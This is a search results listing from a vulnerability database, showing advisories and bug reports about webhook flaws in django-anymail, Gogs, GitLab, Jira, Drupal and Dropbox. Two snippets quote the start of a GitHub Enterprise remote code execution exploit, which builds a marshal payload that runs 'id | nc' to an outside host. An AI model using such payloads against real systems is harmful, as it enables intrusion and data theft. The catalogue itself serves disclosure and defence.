Lucene search
K

698 matches found

Veracode
Veracode
added 2018/03/15 4:36 a.m.17 views

Information Disclosure

django-anymail is vulnerable to information disclosure. When an error occurs, the value of the WEBHOOKAUTHORIZATION setting is printed in the Django error reports. This may allow anyone with access to the logs to discover the webhook shared secret and send inbound/tracking events to your...

7.4CVSS6.9AI score0.01243EPSS
Exploits0References2Affected Software1
CNVD
CNVD
added 2018/02/05 12:0 a.m.1 views

Anymail Timing Attack Vulnerability

Anymail aka django-anymail is an open source e-mail sending and receiving system . A security vulnerability exists in the webhooks/base.py file in versions of Anymail prior to 1.2.1. No details of the vulnerability are provided at this time...

9.1CVSS6.8AI score0.02659EPSS
Exploits0References1
Prion
Prion
added 2018/02/03 9:29 p.m.16 views

Code injection

webhooks/base.py in Anymail aka django-anymail before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOKAUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events...

6.4CVSS9AI score0.02659EPSS
Exploits0References6Affected Software2
UbuntuCve
UbuntuCve
added 2018/02/03 9:29 p.m.28 views

CVE-2018-6596

webhooks/base.py in Anymail aka django-anymail before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOKAUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events...

9.1CVSS7.3AI score0.02659EPSS
Exploits0References8
Debian CVE
Debian CVE
added 2018/02/03 9:0 p.m.19 views

CVE-2018-6596

webhooks/base.py in Anymail aka django-anymail before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOKAUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events...

9.1CVSS9.2AI score0.02659EPSS
Exploits0
CVE
CVE
added 2018/02/03 9:0 p.m.101 views

CVE-2018-6596

CVE-2018-6596 affects Anymail (django-anymail) webhooks/base.py, where a timing attack on the WEBHOOK_AUTHORIZATION secret can let remote attackers post arbitrary email tracking events. Affected versions are before 1.2.1. Remediation as per sources: upgrade to Django-Anymail 1.2.1 or later; Debia...

9.1CVSS8.9AI score0.02659EPSS
Exploits0References6Affected Software1
Veracode
Veracode
added 2017/06/22 8:11 a.m.8 views

Information Disclosure

github.com/gogits/gogs is vulnerable to arbitrary webhook retrieval. GetWebhookByID allows a user to access webhooks from other users' private repositories because it does not check the corresponding repoid when retreiving webhooks...

6.8AI score
Exploits0
Hacker One
Hacker One
added 2017/05/09 1:36 p.m.19 views

Shopify: API Webhooks Fire And Are Unlisted After Permissions Removed

Hi All, quick note, I debated reporting this given recent developments and conversations. However, it seemed odd to wait until June to discuss the potential here, especially after I mulled over the design decision for two weeks having tested this April 25. That said, if you agree with the...

6.5AI score
Exploits0
exploitpack
exploitpack
added 2017/03/15 12:0 a.m.17 views

GitHub Enterprise 2.8.7 - Remote Code Execution

GitHub Enterprise 2.8.7 - Remote Code Execution !/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07...

0.8AI score
Exploits0
Exploit DB
Exploit DB
added 2017/03/15 12:0 a.m.40 views

GitHub Enterprise < 2.8.7 - Remote Code Execution

!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dumpcode2..-1 +...

7.4AI score
Exploits0
Hacker One
Hacker One
added 2016/04/24 11:8 p.m.13 views

GitLab: Attacker can delete (and read) private project webhooks

Vulnerability details An attacker can delete and read webhooks that are configured for all projects on a GitLab instance. This includes private projects. This is a bad vulnerability because these webhooks contain private API tokens most of the time. Proof of concept As a victim, create a project...

6.6AI score
Exploits0
Atlassian
Atlassian
added 2016/02/26 7:31 a.m.34 views

JQL filter for Webhooks doesn't work correctly when "Comment" and "Worklog" related events are fired - CVE-2017-18104

panel:bgColor=e7f4fa NOTE: This bug report is for JIRA Server. Using JIRA Cloud? See the corresponding bug report|http://jira.atlassian.com/browse/JRACLOUD-59980. panel h3. Security information The Webhooks component of Atlassian Jira before version 7.6.7 and from version 7.7.0 before version...

5.9CVSS5.6AI score0.016EPSS
Exploits1
Atlassian
Atlassian
added 2016/02/26 7:31 a.m.109 views

JQL filter for Webhooks doesn't work correctly when "Comment" and "Worklog" related events are fired - CVE-2017-18104

panel:bgColor=e7f4fa NOTE: This bug report is for JIRA Server. Using JIRA Cloud? See the corresponding bug report|http://jira.atlassian.com/browse/JRACLOUD-59980. panel h3. Security information The Webhooks component of Atlassian Jira before version 7.6.7 and from version 7.7.0 before version...

5.9CVSS2.2AI score0.016EPSS
Exploits1Affected Software1
Drupal
Drupal
added 2015/09/16 12:0 a.m.18 views

amoCRM - Moderately Critical - Cross Site Scripting - SA-CONTRIB-2015-149

This module enables you to integrate with amoCRM service using webhooks. The module does not sufficiently sanitize the logged data when malicious POST data is received. This vulnerability is mitigated by the fact that a module such "Database logging" dblog must be enabled which displays log...

2.6CVSS6.2AI score0.00913EPSS
Exploits0References10
Hacker One
Hacker One
added 2015/04/17 2:37 a.m.159 views

Dropbox: SSRF vulnerablity in app webhooks

Server Side Request Forgery SSRF is a vulnerabilty which allows an attacker to make web requests from the context of the server host machine to arbitrary URL's. This vulnerability can allow the attacker to access resources internal to the network, which would otherwise be inaccessible. This...

Exploits0
Atlassian
Atlassian
added 2013/02/06 9:54 p.m.45 views

Not being able to create webhooks with basic authentication.

panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Cloud. Using JIRA Server? See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-31953. panel Using the procedures to use basic auth described on...

Exploits0Affected Software1
Atlassian
Atlassian
added 2013/02/06 9:54 p.m.26 views

Not being able to create webhooks with basic authentication.

Using the procedures to use basic auth described on https://extranet.atlassian.com/display/SUPPORT/Webhooks+readiness+for+JIRA+5.2 we are getting a "Invalid URL" message. !https://jira.atlassian.com/secure/attachment/85015/webhookserror.png! workaround For Atlassian applications, the REST plugin ...

0.3AI score
Exploits0Affected Software1
Atlassian
Atlassian
added 2013/02/06 9:54 p.m.422 views

Not being able to create webhooks with basic authentication.

panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Server. Using JIRA Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-31953. panel Using the procedures to use basic auth described on https://extranet.atlassian.com/display/SUPPORT/Webhooks+readiness+for+JIRA+5...

Exploits0Affected Software1
Rows per page
Query Builder